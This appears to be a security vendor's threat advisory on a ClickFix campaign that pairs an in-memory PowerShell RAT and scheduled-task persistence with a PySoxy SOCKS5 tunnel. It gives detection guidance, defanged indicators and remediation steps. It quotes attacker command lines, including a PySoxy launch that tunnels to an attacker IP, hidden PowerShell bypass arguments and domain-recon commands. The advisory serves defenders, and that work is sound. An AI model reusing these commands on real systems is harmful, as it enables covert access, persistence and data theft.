ClickFix Campaign Evolves with PySoxy SOCKS5 Proxy Deployment
May 18th, 2026
High
Our Cyber Threat Intelligence Unit is monitoring an evolving ClickFix malware campaign that uses PySoxy, an open-source Python SOCKS5 proxy tool, to allow covert remote access and proxy-based communications on compromised systems. First documented by ReliaQuest in April 2026, this is the first known instance of ClickFix being combined with PySoxy-based proxying. The campaign uses social engineering to trick users into executing malicious commands from compromised websites, allowing attackers to deploy payloads and establish persistence without traditional exploit chains. The intrusion chain establishes scheduled task persistence, launches an in-memory PowerShell command-and-control agent, and introduces PySoxy as a second encrypted access path. This creates a modular, redundant foothold that can survive initial blocking attempts. The campaign targets Microsoft Windows environments and has facilitated credential theft, internal reconnaissance, and follow-on payload delivery. Organizations should treat ClickFix-related activity as a significant intrusion risk and strengthen controls around script execution, user awareness, endpoint monitoring, and outbound proxy traffic inspection.
Technical Details
Threat Type: Social Engineering / Malware Delivery with SOCKS5 Proxy Abuse
Severity: High
Affected Systems: Microsoft Windows endpoints; enterprise environments where users can execute scripts or commands manually; networks vulnerable to proxy-based tunneling activity.
Tools Observed:
PowerShell (in-memory RAT)
PySoxy (open-source Python SOCKS5 proxy, compiled bytecode)
Scheduled tasks
Python runtime and compiled bytecode files (.pyc)
curl.exe (staging and exfiltration)
Threat Actor: Unattributed; ClickFix-associated threat operators (attribution remains ongoing)
Attack Chain:
Initial Access: A user visited a compromised website delivering a ClickFix prompt and was deceived into executing an obfuscated PowerShell command launched from explorer.exe.
The campaign relies entirely on social engineering rather than software exploitation.
Execution: The PowerShell stager retrieved and executed a secondary payload in memory without writing to disk.
This payload functioned as a lightweight RAT, polling the attacker's C2 infrastructure every 3 seconds to receive and execute commands.
Staged files, including the PySoxy bytecode (b64.pyc), were written to C:\ProgramData. PySoxy was then executed via:
python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97
This established a second, independent encrypted proxy tunnel to attacker infrastructure over port 443.
Persistence: A scheduled task was created to relaunch the PowerShell RAT approximately every 40 minutes using the following arguments:
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden
This allowed the intrusion to survive process termination and C2 blocking.
Discovery: Built-in Windows tools were used to enumerate user group memberships, domain roles, and domain controllers (nltest.exe /dclist).
LDAP-based machine enumeration and SMB activity against discovered systems were also observed.
Reconnaissance output was staged to C:\ProgramData and exfiltrated via curl.
Defense Evasion: PySoxy traffic blends with normal encrypted outbound activity. Reliance on trusted system interpreters (PowerShell, Python) avoids dropping traditionally detectable binaries.
Individual behaviors in this chain appear benign in isolation; correlation across stages is required to identify the intrusion.
Post-Exploitation:
Credential harvesting from browsers, local stores, and authentication tokens
Remote command execution through SOCKS5-tunneled channels
Internal reconnaissance and lateral movement via compromised endpoints
Potential delivery of additional malware families and data exfiltration through proxied channels
Impact
Credential and Secrets Compromise: PySoxy-based proxy access allows theft of sensitive data, including API keys, authentication tokens, browser-stored credentials, SSH keys, and cloud service access details from compromised endpoints.
Network Proxy Abuse: Infected systems can be converted into covert SOCKS5 proxy nodes, allowing attackers to route malicious traffic through internal networks while concealing their true origin.
Lateral Movement: Compromised endpoints can serve as pivot points to scan internal networks, access shared resources, and move laterally using authenticated sessions or harvested credentials.
Command and Control Evasion: The SOCKS5 proxy layer allows attackers to tunnel communications through legitimate-looking encrypted traffic, making detection of outbound C2 activity significantly more difficult.
Data Exfiltration: Sensitive organizational data may be exfiltrated through encrypted or proxied channels, bypassing traditional perimeter-based security controls.
Persistent Unauthorized Access: The scheduled task persistence mechanism allows the intrusion to outlast initial blocking attempts, with the task continuing to re-execute the PowerShell RAT approximately every 40 minutes even after outbound C2 connections are disrupted.
Security Visibility Loss: The use of legitimate open-source tooling blended with normal system interpreter activity reduces endpoint and network detection effectiveness, increasing attacker dwell time.
Detection Method
Security teams should monitor endpoint, network, and user activity telemetry for the following behavioral indicators:
Endpoint and Process Monitoring:
Monitor process execution events (e.g., Sysmon Event ID 1) for suspicious PowerShell (powershell.exe), Windows Command Shell (cmd.exe), or Python (python.exe) processes launched from browser processes, document readers, or user-initiated scripts.
Detect execution of obfuscated or encoded PowerShell commands initiated directly from user desktop sessions, particularly commands launched from explorer.exe.
Flag creation of compiled Python bytecode files (.pyc) or unknown Python components staged to C:\ProgramData or other non-standard directories.
Identify scheduled tasks created shortly after suspicious PowerShell execution, particularly those referencing Python interpreters or proxy-related executables and using arguments such as -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden.
Monitor for PowerShell-to-Python execution chains, including PowerShell launching curl.exe, downloading .pyc files, or spawning python.exe.
Detect Python command lines containing proxy-style arguments such as -ssl, -remote_ip, -remote_port, or .pyc execution from non-standard paths
Network and Proxy Monitoring:
Detect outbound traffic consistent with SOCKS5 proxy tunneling behavior, including persistent long-lived encrypted connections over port 443 originating from Python processes.
Monitor for unusual encrypted or tunneled traffic from user endpoints that bypasses standard web proxy inspection.
Flag repeated or high-frequency outbound connections (e.g., polling every few seconds) to unknown infrastructure following script execution events.
Identify endpoints acting as internal relay nodes forwarding traffic between internal and external networks.
User and Web Activity Monitoring:
Monitor for user interaction with websites displaying ClickFix-style prompts that instruct command execution, including fake error messages or "verification required" pages.
Detect clipboard copy-and-execute behavior involving PowerShell or command-line instructions originating from browser sessions.
Post-Persistence Hunting:
After detecting ClickFix-style activity, do not treat a blocked C2 connection as containment.
Review all scheduled tasks created around the time of initial execution and validate their triggers, actions, and referenced paths.
Hunt for C:\ProgramData staging artifacts, including PowerShell scripts and .pyc bytecode files.
Review domain reconnaissance indicators, including whoami /groups, nltest.exe /dclist, LDAP enumeration commands, and anomalous SMB activity following initial compromise.
Indicators of Compromise
Indicator Type | Indicator | Description |
IP Address | 185.205.211[.]217 | ClickFix infrastructure IP |
IP Address | 206.206.103[.]106 | Staging and exfiltration IP |
IP Address | 206.206.103[.]120 | PowerShell RAT C2 |
IP Address | 167.99.158[.]97 | PySoxy proxy destination IP |
Domain | strapness[.]com | ClickFix stager domain |
Domain | overlateise[.]com | Hosted ClickFix script injected into compromised site |
Domain | abledom[.]net | Secondary C2 domain |
Recommendations
Organizations should take the following actions:
User Awareness and Containment:
Educate users to avoid executing commands copied from browser pages, pop-ups, or verification-style prompts.
ClickFix campaigns rely on social engineering and clipboard-based execution rather than software exploitation; user awareness is the primary prevention layer.
Isolate endpoints where suspicious PowerShell or Python execution was observed following user interaction with web content.
Do not treat a blocked outbound connection as containment, as the scheduled task persistence mechanism can continue re-executing the attack chain for hours after C2 blocking.
Endpoint Investigation:
Perform a full forensic review of affected systems to identify malicious PowerShell or Python execution chains, staged .pyc files, and scheduled task artifacts.
Inspect C:\ProgramData for staged scripts, compiled Python bytecode, and exfiltration-related log files.
Remove all components supporting re-execution, including scheduled tasks, staged PowerShell scripts, Python runtimes, and .pyc bytecode files.
Leaving any single component in place may allow the intrusion to resume.
Network Containment:
Block and monitor outbound connections associated with SOCKS5 proxy behavior, particularly long-lived encrypted sessions over port 443 originating from Python processes.
Implement inspection for anomalous tunneling traffic that bypasses corporate proxy infrastructure.
Flag endpoints generating high-frequency outbound connection attempts shortly after script execution events.
Credential Protection:
Reset and rotate credentials for affected users, including browser-stored passwords, cloud service logins, SSH keys, and locally cached authentication tokens.
Enforce MFA across all critical systems to reduce the risk of credential reuse from compromised endpoints.
Monitoring and Detection Improvements:
Develop correlation rules that link the full attack chain:
browser activity → clipboard-initiated PowerShell execution → scheduled task creation → file writes to C:\ProgramData → Python proxy execution.
Individual signals may appear benign in isolation; cross-stage correlation is required for reliable detection.
Alert on Python processes using proxy-style arguments such as -ssl, -remote_ip, or -remote_port.
Monitor for high-frequency PowerShell outbound beaconing (polling intervals of seconds) indicative of an in-memory RAT.
Incident Response:
Treat ClickFix incidents that include scheduled task persistence and secondary tooling as active compromise investigations, not isolated user-execution events.
Initiate host isolation, memory capture, and full artifact review before declaring containment.
Conclusion
The ClickFix campaign documented by ReliaQuest in April 2026 marks a significant advancement in ClickFix techniques, shifting from single-use execution to a modular, multi-stage post-exploitation framework. Attackers used PySoxy, an open-source Python SOCKS5 proxy, along with an in-memory PowerShell RAT and scheduled-task persistence to establish redundant access paths that remained active for hours after initial C2 blocking. As a result, network-level blocking alone is not sufficient for containment. Organizations should treat ClickFix incidents involving persistence or secondary tools as full-scale compromises, prioritizing host isolation, thorough artifact removal, and behavioral detection across all stages to disrupt the entire access chain.